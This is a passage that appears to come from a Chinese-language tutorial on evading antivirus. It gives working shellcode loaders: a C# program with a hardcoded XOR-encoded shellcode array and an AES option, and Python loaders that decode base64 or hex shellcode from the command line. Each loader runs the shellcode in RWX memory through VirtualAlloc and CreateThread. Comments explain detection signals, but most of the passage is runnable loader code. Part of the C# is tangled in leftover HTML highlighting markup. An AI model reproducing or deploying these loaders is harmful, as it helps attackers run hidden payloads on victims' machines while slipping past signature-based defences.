static class Program
{
//
// CRYPTO FUNCTIONS
//
// Extension helper: copies length elements of data starting at index into a fresh array
// (used below to split a blob into IV || ciphertext). A bad range throws from the array
// allocation or from the copy, exactly as the framework reports it.
private static T[] SubArray<T>(this T[] data, int index, int length)
{
    var slice = new T[length];
    Array.ConstrainedCopy(data, index, slice, 0, length);
    return slice;
}

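    // Repeating-key XOR: plain[i] = cipher[i] ^ key[i % key.Length]. Symmetric, so the same
    // routine encodes and decodes. Returns a new array; neither input is modified.
    //
    // Security note: this is obfuscation, not encryption. Unencoded msfvenom x64 payloads,
    // like the one in the MMF example above, all start with the same block-API prologue
    // (0xfc 0x48 0x83 0xe4 0xf0 ...), so XORing that known prefix against the blob hands an
    // analyst the first key.Length bytes of key stream. It only defeats static byte signatures.
    //
    // Throws ArgumentNullException for a null cipher and ArgumentException for a null or empty
    // key; the original divided by key.Length and surfaced a DivideByZeroException instead.
    private static byte[] xor(byte[] cipher, byte[] key) {
        if (cipher == null) {
            throw new ArgumentNullException("cipher");
        }
        if (key == null || key.Length == 0) {
            throw new ArgumentException("key must not be empty", "key");
        }

        byte[] plain = new byte[cipher.Length];
        int keyLen = key.Length;

        for (int i = 0; i < plain.Length; i++) {
            plain[i] = (byte)(cipher[i] ^ key[i % keyLen]);
        }

        return plain;
    }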

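    //--------------------------------------------------------------------------------------------------
    // AES-128-CBC / PKCS7 decryption of a blob laid out as IV (16 bytes) || ciphertext.
    //   cipher : IV followed by the ciphertext; must be at least 16 bytes.
    //   key    : 16-byte AES key.
    // Returns the plaintext with padding removed.
    // Throws ArgumentNullException for a null cipher, ArgumentException when cipher is shorter
    // than the IV, and CryptographicException from the provider when the key length, the
    // ciphertext length or the padding is wrong.
    //
    // Notes for anyone reusing this:
    //  - There is no MAC/tag. CBC alone gives no integrity, so a tampered blob is only noticed
    //    if the PKCS7 padding happens to break. Acceptable for a local loader decrypting its own
    //    resource; not acceptable for data received over a network.
    //  - Aes.Create() replaces AesManaged: same algorithm and output, but AesManaged is a purely
    //    managed implementation that throws under an enforced FIPS policy and is marked obsolete
    //    on newer runtimes, while Aes.Create() returns the platform provider.
    //--------------------------------------------------------------------------------------------------
    private static byte[] aesDecrypt(byte[] cipher, byte[] key)
    {
        if (cipher == null)
        {
            throw new ArgumentNullException("cipher");
        }
        if (cipher.Length < 16)
        {
            throw new ArgumentException("cipher must start with a 16-byte IV", "cipher");
        }

        var iv = cipher.SubArray(0, 16);
        var body = cipher.SubArray(16, cipher.Length - 16);

        using (Aes aes = Aes.Create())
        {
            aes.Mode = CipherMode.CBC;      // the implicit default, spelled out so the format is unambiguous
            aes.Padding = PaddingMode.PKCS7;
            aes.KeySize = 128;              // must precede Key: assigning KeySize regenerates a random key
            aes.Key = key;
            aes.IV = iv;

            using (MemoryStream ms = new MemoryStream())
            {
                using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(), CryptoStreamMode.Write))
                {
                    cs.Write(body, 0, body.Length);
                }   // disposing the CryptoStream flushes the final block and strips the padding

                return ms.ToArray();
            }
        }
    }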

    <span class="c1">//==============================================================================</span>
    <span class="c1">// MAIN FUNCTION</span>
    <span class="c1">//==============================================================================</span>
    <span class="k">static</span> <span class="k">void</span> <span class="nf">Main</span><span class="p">()</span>
    <span class="p">{</span>
        <span class="kt">byte</span><span class="p">[]</span> <span class="n">encryptedShellcode</span> <span class="p">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="p">[]</span> <span class="p">{</span> <span class="m">0</span><span class="n">x8d</span><span class="p">,</span><span class="m">0</span><span class="n">x81</span><span class="p">,</span><span class="m">0</span><span class="n">xec</span><span class="p">,</span><span class="m">0</span><span class="n">x67</span><span class="p">,</span><span class="m">0</span><span class="n">x71</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x0e</span><span class="p">,</span><span class="m">0</span><span class="n">xee</span><span class="p">,</span><span class="m">0</span><span class="n">x94</span><span class="p">,</span><span class="m">0</span><span class="n">x58</span><span class="p">,</span><span class="m">0</span><span class="n">xae</span><span class="p">,</span><span class="m">0</span><span class="n">x03</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x39</span><span class="p">,</span><span class="m">0</span><span class="n">x5e</span><span class="p">,</span><span class="m">0</span><span class="n">xec</span><span class="p">,</span><span class="m">0</span><span class="n">x23</span><span class="p">,</span><span class="m">0</span><span class="n">x65</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x35</span><span class="p">,</span><span class="m">0</span><span class="n">x65</span><span class="p">,</span><span class="m">0</span><span class="n">xe2</span><span class="p">,</span><span class="m">0</span><span class="n">x1c</span><span class="p">,</span><span class="m">0</span><span class="n">x4f</span><span 
class="p">,</span><span class="m">0</span><span class="n">x7e</span><span class="p">,</span><span class="m">0</span><span class="n">xde</span><span class="p">,</span><span class="m">0</span><span class="n">x24</span><span class="p">,</span><span class="m">0</span><span class="n">x41</span><span class="p">,</span><span class="m">0</span><span class="n">x40</span><span class="p">,</span><span class="m">0</span><span class="n">x96</span><span class="p">,</span><span class="m">0</span><span class="n">xc2</span><span class="p">,</span><span class="m">0</span><span class="n">x5b</span><span class="p">,</span><span class="m">0</span><span class="n">x10</span><span class="p">,</span><span class="m">0</span><span class="n">x15</span><span class="p">,</span><span class="m">0</span><span class="n">x6c</span><span class="p">,</span><span class="m">0</span><span class="n">x4b</span><span class="p">,</span><span class="m">0</span><span class="n">x51</span><span class="p">,</span><span class="m">0</span><span class="n">xa8</span><span class="p">,</span><span class="m">0</span><span class="n">xa1</span><span class="p">,</span><span class="m">0</span><span class="n">x6a</span><span class="p">,</span><span class="m">0</span><span class="n">x70</span><span class="p">,</span><span class="m">0</span><span class="n">xae</span><span class="p">,</span><span class="m">0</span><span class="n">x8c</span><span class="p">,</span><span class="m">0</span><span class="n">x95</span><span class="p">,</span><span class="m">0</span><span class="n">x23</span><span class="p">,</span><span class="m">0</span><span class="n">x3e</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x35</span><span class="p">,</span><span class="m">0</span><span class="n">x61</span><span class="p">,</span><span class="m">0</span><span class="n">xe2</span><span class="p">,</span><span class="m">0</span><span class="n">x24</span><span 
class="p">,</span><span class="m">0</span><span class="n">x5b</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x25</span><span class="p">,</span><span class="m">0</span><span class="n">x7f</span><span class="p">,</span><span class="m">0</span><span class="n">x1f</span><span class="p">,</span><span class="m">0</span><span class="n">x92</span><span class="p">,</span><span class="m">0</span><span class="n">x21</span><span class="p">,</span><span class="m">0</span><span class="n">x6f</span><span class="p">,</span><span class="m">0</span><span class="n">xb6</span><span class="p">,</span><span class="m">0</span><span class="n">x20</span><span class="p">,</span><span class="m">0</span><span class="n">xe2</span><span class="p">,</span><span class="m">0</span><span class="n">x37</span><span class="p">,</span><span class="m">0</span><span class="n">x47</span><span class="p">,</span><span class="m">0</span><span class="n">x70</span><span class="p">,</span><span class="m">0</span><span class="n">xba</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x2e</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x8a</span><span class="p">,</span><span class="m">0</span><span class="n">x54</span><span class="p">,</span><span class="m">0</span><span class="n">x2e</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x5d</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x66</span><span class="p">,</span><span class="m">0</span><span class="n">xa7</span><span class="p">,</span><span class="m">0</span><span class="n">x58</span><span 
class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">xcb</span><span class="p">,</span><span class="m">0</span><span class="n">xb0</span><span class="p">,</span><span class="m">0</span><span class="n">xa6</span><span class="p">,</span><span class="m">0</span><span class="n">x63</span><span class="p">,</span><span class="m">0</span><span class="n">x66</span><span class="p">,</span><span class="m">0</span><span class="n">xb6</span><span class="p">,</span><span class="m">0</span><span class="n">x51</span><span class="p">,</span><span class="m">0</span><span class="n">x8e</span><span class="p">,</span><span class="m">0</span><span class="n">x12</span><span class="p">,</span><span class="m">0</span><span class="n">x87</span><span class="p">,</span><span class="m">0</span><span class="n">x6a</span><span class="p">,</span><span class="m">0</span><span class="n">x13</span><span class="p">,</span><span class="m">0</span><span class="n">x9f</span><span class="p">,</span><span class="m">0</span><span class="n">x4a</span><span class="p">,</span><span class="m">0</span><span class="n">x14</span><span class="p">,</span><span class="m">0</span><span class="n">x4a</span><span class="p">,</span><span class="m">0</span><span class="n">x12</span><span class="p">,</span><span class="m">0</span><span class="n">x95</span><span class="p">,</span><span class="m">0</span><span class="n">x31</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x3f</span><span class="p">,</span><span class="m">0</span><span class="n">x55</span><span class="p">,</span><span class="m">0</span><span class="n">x68</span><span class="p">,</span><span class="m">0</span><span class="n">xbd</span><span class="p">,</span><span class="m">0</span><span class="n">x01</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span 
class="p">,</span><span class="m">0</span><span class="n">x65</span><span class="p">,</span><span class="m">0</span><span class="n">x25</span><span class="p">,</span><span class="m">0</span><span class="n">xec</span><span class="p">,</span><span class="m">0</span><span class="n">x29</span><span class="p">,</span><span class="m">0</span><span class="n">x75</span><span class="p">,</span><span class="m">0</span><span class="n">x6f</span><span class="p">,</span><span class="m">0</span><span class="n">xb4</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x6d</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x66</span><span class="p">,</span><span class="m">0</span><span class="n">xa1</span><span class="p">,</span><span class="m">0</span><span class="n">xe0</span><span class="p">,</span><span class="m">0</span><span class="n">x2a</span><span class="p">,</span><span class="m">0</span><span class="n">x43</span><span class="p">,</span><span class="m">0</span><span class="n">x55</span><span class="p">,</span><span class="m">0</span><span class="n">x32</span><span class="p">,</span><span class="m">0</span><span class="n">x35</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x28</span><span class="p">,</span><span class="m">0</span><span class="n">x33</span><span class="p">,</span><span class="m">0</span><span class="n">x3f</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">x36</span><span class="p">,</span><span class="m">0</span><span class="n">x31</span><span class="p">,</span><span class="m">0</span><span class="n">x3d</span><span 
class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x7b</span><span class="p">,</span><span class="m">0</span><span class="n">x85</span><span class="p">,</span><span class="m">0</span><span class="n">xea</span><span class="p">,</span><span class="m">0</span><span class="n">x2c</span><span class="p">,</span><span class="m">0</span><span class="n">x01</span><span class="p">,</span><span class="m">0</span><span class="n">x5d</span><span class="p">,</span><span class="m">0</span><span class="n">x55</span><span class="p">,</span><span class="m">0</span><span class="n">x71</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x10</span><span class="p">,</span><span class="m">0</span><span class="n">x02</span><span class="p">,</span><span class="m">0</span><span class="n">x5b</span><span class="p">,</span><span class="m">0</span><span class="n">x31</span><span class="p">,</span><span class="m">0</span><span class="n">x33</span><span class="p">,</span><span class="m">0</span><span class="n">x19</span><span class="p">,</span><span class="m">0</span><span class="n">x25</span><span class="p">,</span><span class="m">0</span><span class="n">x19</span><span class="p">,</span><span class="m">0</span><span class="n">x41</span><span class="p">,</span><span class="m">0</span><span class="n">x76</span><span class="p">,</span><span class="m">0</span><span class="n">xe0</span><span class="p">,</span><span class="m">0</span><span class="n">x86</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">xa1</span><span class="p">,</span><span class="m">0</span><span class="n">xd1</span><span class="p">,</span><span class="m">0</span><span class="n">xfe</span><span 
class="p">,</span><span class="m">0</span><span class="n">x66</span><span class="p">,</span><span class="m">0</span><span class="n">x71</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x47</span><span class="p">,</span><span class="m">0</span><span class="n">xa3</span><span class="p">,</span><span class="m">0</span><span class="n">x25</span><span class="p">,</span><span class="m">0</span><span class="n">x39</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x4e</span><span class="p">,</span><span class="m">0</span><span class="n">xf1</span><span class="p">,</span><span class="m">0</span><span class="n">x02</span><span class="p">,</span><span class="m">0</span><span class="n">x6e</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">xa4</span><span class="p">,</span><span class="m">0</span><span class="n">x03</span><span class="p">,</span><span class="m">0</span><span class="n">x64</span><span class="p">,</span><span class="m">0</span><span class="n">x0f</span><span class="p">,</span><span class="m">0</span><span class="n">xb1</span><span class="p">,</span><span class="m">0</span><span class="n">xc1</span><span class="p">,</span><span class="m">0</span><span class="n">xc0</span><span class="p">,</span><span class="m">0</span><span class="n">xe9</span><span class="p">,</span><span class="m">0</span><span class="n">x19</span><span class="p">,</span><span class="m">0</span><span class="n">x6b</span><span class="p">,</span><span class="m">0</span><span class="n">x6e</span><span class="p">,</span><span class="m">0</span><span class="n">x76</span><span class="p">,</span><span class="m">0</span><span class="n">x2d</span><span class="p">,</span><span class="m">0</span><span class="n">xe0</span><span 
class="p">,</span><span class="m">0</span><span class="n">x88</span><span class="p">,</span><span class="m">0</span><span class="n">x37</span><span class="p">,</span><span class="m">0</span><span class="n">x21</span><span class="p">,</span><span class="m">0</span><span class="n">x39</span><span class="p">,</span><span class="m">0</span><span class="n">x3e</span><span class="p">,</span><span class="m">0</span><span class="n">x27</span><span class="p">,</span><span class="m">0</span><span class="n">x21</span><span class="p">,</span><span class="m">0</span><span class="n">x29</span><span class="p">,</span><span class="m">0</span><span class="n">x3e</span><span class="p">,</span><span class="m">0</span><span class="n">x0f</span><span class="p">,</span><span class="m">0</span><span class="n">x9b</span><span class="p">,</span><span class="m">0</span><span class="n">x66</span><span class="p">,</span><span class="m">0</span><span class="n">xb1</span><span class="p">,</span><span class="m">0</span><span class="n">x87</span><span class="p">,</span><span class="m">0</span><span class="n">x8e</span><span class="p">,</span><span class="m">0</span><span class="n">xbc</span><span class="p">,</span><span class="m">0</span><span class="n">xf9</span><span class="p">,</span><span class="m">0</span><span class="n">x0d</span><span class="p">,</span><span class="m">0</span><span class="n">x61</span><span class="p">,</span><span class="m">0</span><span class="n">x3f</span><span class="p">,</span><span class="m">0</span><span class="n">x39</span><span class="p">,</span><span class="m">0</span><span class="n">x0f</span><span class="p">,</span><span class="m">0</span><span class="n">xe8</span><span class="p">,</span><span class="m">0</span><span class="n">xcc</span><span class="p">,</span><span class="m">0</span><span class="n">x1a</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x8e</span><span 
class="p">,</span><span class="m">0</span><span class="n">xbc</span><span class="p">,</span><span class="m">0</span><span class="n">xeb</span><span class="p">,</span><span class="m">0</span><span class="n">xa7</span><span class="p">,</span><span class="m">0</span><span class="n">x05</span><span class="p">,</span><span class="m">0</span><span class="n">x63</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">x29</span><span class="p">,</span><span class="m">0</span><span class="n">x79</span><span class="p">,</span><span class="m">0</span><span class="n">x1c</span><span class="p">,</span><span class="m">0</span><span class="n">x82</span><span class="p">,</span><span class="m">0</span><span class="n">x8f</span><span class="p">,</span><span class="m">0</span><span class="n">x16</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x6e</span><span class="p">,</span><span class="m">0</span><span class="n">x67</span><span class="p">,</span><span class="m">0</span><span class="n">x1b</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x04</span><span class="p">,</span><span class="m">0</span><span class="n">x63</span><span class="p">,</span><span class="m">0</span><span class="n">x27</span><span class="p">,</span><span class="m">0</span><span class="n">x3e</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x65</span><span class="p">,</span><span class="m">0</span><span class="n">xa8</span><span class="p">,</span><span class="m">0</span><span class="n">xa1</span><span class="p">,</span><span class="m">0</span><span class="n">x31</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span 
class="p">,</span><span class="m">0</span><span class="n">xa4</span><span class="p">,</span><span class="m">0</span><span class="n">xea</span><span class="p">,</span><span class="m">0</span><span class="n">x96</span><span class="p">,</span><span class="m">0</span><span class="n">x67</span><span class="p">,</span><span class="m">0</span><span class="n">x0f</span><span class="p">,</span><span class="m">0</span><span class="n">x5f</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x51</span><span class="p">,</span><span class="m">0</span><span class="n">x1b</span><span class="p">,</span><span class="m">0</span><span class="n">x29</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x67</span><span class="p">,</span><span class="m">0</span><span class="n">x61</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x6e</span><span class="p">,</span><span class="m">0</span><span class="n">x31</span><span class="p">,</span><span class="m">0</span><span class="n">x1b</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x3f</span><span class="p">,</span><span class="m">0</span><span class="n">xd5</span><span class="p">,</span><span class="m">0</span><span class="n">x3a</span><span class="p">,</span><span class="m">0</span><span class="n">x8b</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">xa4</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x3d</span><span 
class="p">,</span><span class="m">0</span><span class="n">x0d</span><span class="p">,</span><span class="m">0</span><span class="n">x71</span><span class="p">,</span><span class="m">0</span><span class="n">x3f</span><span class="p">,</span><span class="m">0</span><span class="n">x3d</span><span class="p">,</span><span class="m">0</span><span class="n">x30</span><span class="p">,</span><span class="m">0</span><span class="n">x19</span><span class="p">,</span><span class="m">0</span><span class="n">x6b</span><span class="p">,</span><span class="m">0</span><span class="n">xb7</span><span class="p">,</span><span class="m">0</span><span class="n">xaf</span><span class="p">,</span><span class="m">0</span><span class="n">x2e</span><span class="p">,</span><span class="m">0</span><span class="n">x96</span><span class="p">,</span><span class="m">0</span><span class="n">xbb</span><span class="p">,</span><span class="m">0</span><span class="n">xe4</span><span class="p">,</span><span class="m">0</span><span class="n">x89</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x13</span><span class="p">,</span><span class="m">0</span><span class="n">x4f</span><span class="p">,</span><span class="m">0</span><span class="n">x29</span><span class="p">,</span><span class="m">0</span><span class="n">x01</span><span class="p">,</span><span class="m">0</span><span class="n">x6e</span><span class="p">,</span><span class="m">0</span><span class="n">x27</span><span class="p">,</span><span class="m">0</span><span class="n">x71</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x04</span><span class="p">,</span><span class="m">0</span><span class="n">x67</span><span class="p">,</span><span class="m">0</span><span class="n">x21</span><span class="p">,</span><span class="m">0</span><span class="n">x01</span><span 
class="p">,</span><span class="m">0</span><span class="n">x65</span><span class="p">,</span><span class="m">0</span><span class="n">x48</span><span class="p">,</span><span class="m">0</span><span class="n">x7e</span><span class="p">,</span><span class="m">0</span><span class="n">x59</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">xb2</span><span class="p">,</span><span class="m">0</span><span class="n">x26</span><span class="p">,</span><span class="m">0</span><span class="n">x01</span><span class="p">,</span><span class="m">0</span><span class="n">x1b</span><span class="p">,</span><span class="m">0</span><span class="n">x09</span><span class="p">,</span><span class="m">0</span><span class="n">x3c</span><span class="p">,</span><span class="m">0</span><span class="n">x08</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">xb2</span><span class="p">,</span><span class="m">0</span><span class="n">x2f</span><span class="p">,</span><span class="m">0</span><span class="n">x37</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">x6b</span><span class="p">,</span><span class="m">0</span><span class="n">x55</span><span class="p">,</span><span class="m">0</span><span class="n">x66</span><span class="p">,</span><span class="m">0</span><span class="n">xeb</span><span class="p">,</span><span class="m">0</span><span class="n">x17</span><span class="p">,</span><span class="m">0</span><span class="n">x8e</span><span class="p">,</span><span class="m">0</span><span class="n">x96</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">x8e</span><span class="p">,</span><span class="m">0</span><span class="n">xea</span><span 
class="p">,</span><span class="m">0</span><span class="n">x96</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">x70</span><span class="p">,</span><span class="m">0</span><span class="n">xaa</span><span class="p">,</span><span class="m">0</span><span class="n">x47</span><span class="p">,</span><span class="m">0</span><span class="n">xa1</span><span class="p">,</span><span class="m">0</span><span class="n">x04</span><span class="p">,</span><span class="m">0</span><span class="n">xa8</span><span class="p">,</span><span class="m">0</span><span class="n">xad</span><span class="p">,</span><span class="m">0</span><span class="n">xdc</span><span class="p">,</span><span class="m">0</span><span class="n">x81</span><span class="p">,</span><span class="m">0</span><span class="n">xdc</span><span class="p">,</span><span class="m">0</span><span class="n">xcc</span><span class="p">,</span><span class="m">0</span><span class="n">x31</span><span class="p">,</span><span class="m">0</span><span class="n">x1b</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x3d</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">xa4</span> <span class="p">};</span>
        <span class="kt">string</span> <span class="n">key</span> <span class="p">=</span> <span class="s">"qing"</span><span class="p">;</span>
        <span class="kt">string</span> <span class="n">cipherType</span> <span class="p">=</span> <span class="s">"xor"</span><span class="p">;</span>


        <span class="kt">byte</span><span class="p">[]</span> <span class="n">shellcode</span> <span class="p">=</span> <span class="k">null</span><span class="p">;</span>

        <span class="c1">//--------------------------------------------------------------</span>
        <span class="c1">// Decrypt the shellcode</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">cipherType</span> <span class="p">==</span> <span class="s">"xor"</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">shellcode</span> <span class="p">=</span> <span class="n">xor</span><span class="p">(</span><span class="n">encryptedShellcode</span><span class="p">,</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">key</span><span class="p">));</span>
        <span class="p">}</span>
        <span class="k">else</span> <span class="nf">if</span> <span class="p">(</span><span class="n">cipherType</span> <span class="p">==</span> <span class="s">"aes"</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">shellcode</span> <span class="p">=</span> <span class="n">aesDecrypt</span><span class="p">(</span><span class="n">encryptedShellcode</span><span class="p">,</span> <span class="n">Convert</span><span class="p">.</span><span class="n">FromBase64String</span><span class="p">(</span><span class="n">key</span><span class="p">));</span>
        <span class="p">}</span>

        <span class="c1">//--------------------------------------------------------------            </span>
        <span class="c1">// Copy decrypted shellcode to memory</span>
        <span class="n">UInt32</span> <span class="n">funcAddr</span> <span class="p">=</span> <span class="n">VirtualAlloc</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="p">(</span><span class="n">UInt32</span><span class="p">)</span><span class="n">shellcode</span><span class="p">.</span><span class="n">Length</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
        <span class="n">Marshal</span><span class="p">.</span><span class="n">Copy</span><span class="p">(</span><span class="n">shellcode</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="p">(</span><span class="n">IntPtr</span><span class="p">)(</span><span class="n">funcAddr</span><span class="p">),</span> <span class="n">shellcode</span><span class="p">.</span><span class="n">Length</span><span class="p">);</span>
        <span class="n">IntPtr</span> <span class="n">hThread</span> <span class="p">=</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">;</span>
        <span class="n">UInt32</span> <span class="n">threadId</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span>

        <span class="c1">// Prepare data</span>
        <span class="n">IntPtr</span> <span class="n">pinfo</span> <span class="p">=</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">;</span>

        <span class="c1">// Invoke the shellcode</span>
        <span class="n">hThread</span> <span class="p">=</span> <span class="n">CreateThread</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="n">funcAddr</span><span class="p">,</span> <span class="n">pinfo</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="k">ref</span> <span class="n">threadId</span><span class="p">);</span>
        <span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">hThread</span><span class="p">,</span> <span class="m">0</span><span class="n">xFFFFFFFF</span><span class="p">);</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">private</span> <span class="k">static</span> <span class="n">UInt32</span> <span class="n">MEM_COMMIT</span> <span class="p">=</span> <span class="m">0</span><span class="n">x1000</span><span class="p">;</span>
    <span class="k">private</span> <span class="k">static</span> <span class="n">UInt32</span> <span class="n">PAGE_EXECUTE_READWRITE</span> <span class="p">=</span> <span class="m">0</span><span class="n">x40</span><span class="p">;</span>

    <span class="c1">// The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject</span>

[DllImport(“kernel32”)]
private static extern UInt32 VirtualAlloc(
UInt32 lpStartAddr,
UInt32 size,
UInt32 flAllocationType,
UInt32 flProtect
);

[DllImport(“kernel32”)]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);

[DllImport(“kernel32”)]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
}
}

其他语言也是一样,比如 Python 中用异或编码、Base64、十六进制等方式都是可以的

py Base64

(k8gege):

import ctypes
import sys
import base64
#calc.exe
#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
# Loader sketch: the payload arrives as argv[1] as base64 wrapping a hex string,
# so it is decoded twice before use. NOTE(review): str.decode("hex") is a
# Python 2 idiom — confirm which interpreter this was written for.
shellcode=bytearray(base64.b64decode(sys.argv[1]).decode("hex"))
# 0x40 is PAGE_EXECUTE_READWRITE (the same value the C# sample above uses) and
# 0x3000 is MEM_COMMIT | MEM_RESERVE, i.e. a private RWX region. Encoding the
# payload only changes what sits on disk; this allocation is identical to the
# unencoded version and is exactly what behavioural detection and memory
# scanners key on.
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

# ctypes view over the bytearray so the copy below reads it directly.
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

# Copy the decoded bytes into the RWX region. From here on the plaintext
# payload sits in process memory, so any memory scan sees it regardless of
# how it was encoded at rest.
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))

# The third argument is the thread start address: the allocated region itself.
# A thread starting in memory not backed by a loaded module is the classic
# signal detection engines flag, and it is unaffected by the encoding step.
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))

# c_int(-1) is the INFINITE timeout (0xFFFFFFFF, as in the C# sample above):
# block until the thread exits.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

py 十六进制:
import ctypes
import sys
#calc.exe
#sc = "DBC3D97424F4BEE85A27135F31C9B13331771783C704039F49C5E6A38680095B57F380BE6621F6CBDBF57C99D77ED00963F2FD3EC4B9DB71D50FE4DD1511981F4AF1A1D09FF0E60C6FA0BF5BC255CB19DF541B165F2F1EE81485213884926AA0AEFD4AD1631EB69808D54C1BD927AC2A25EB9383A8F5D42353802E50EE93F42B3411E98BBF81C92A13579920D813C524DFF07D5054F751D12EDC75BAF57D2F665B812FCE04273BFC5151666AA7D31CD3A7EB1E73C0DA951C97E27F5967A922CBE074B74E6D876D8C8804846C6F14ED692B921D03247722B045524157D63EA8F25EA4B4"
# Same loader as the base64 variant, with the payload passed as a plain hex
# string in argv[1]. NOTE(review): str.decode("hex") is a Python 2 idiom —
# confirm the interpreter version this targets.
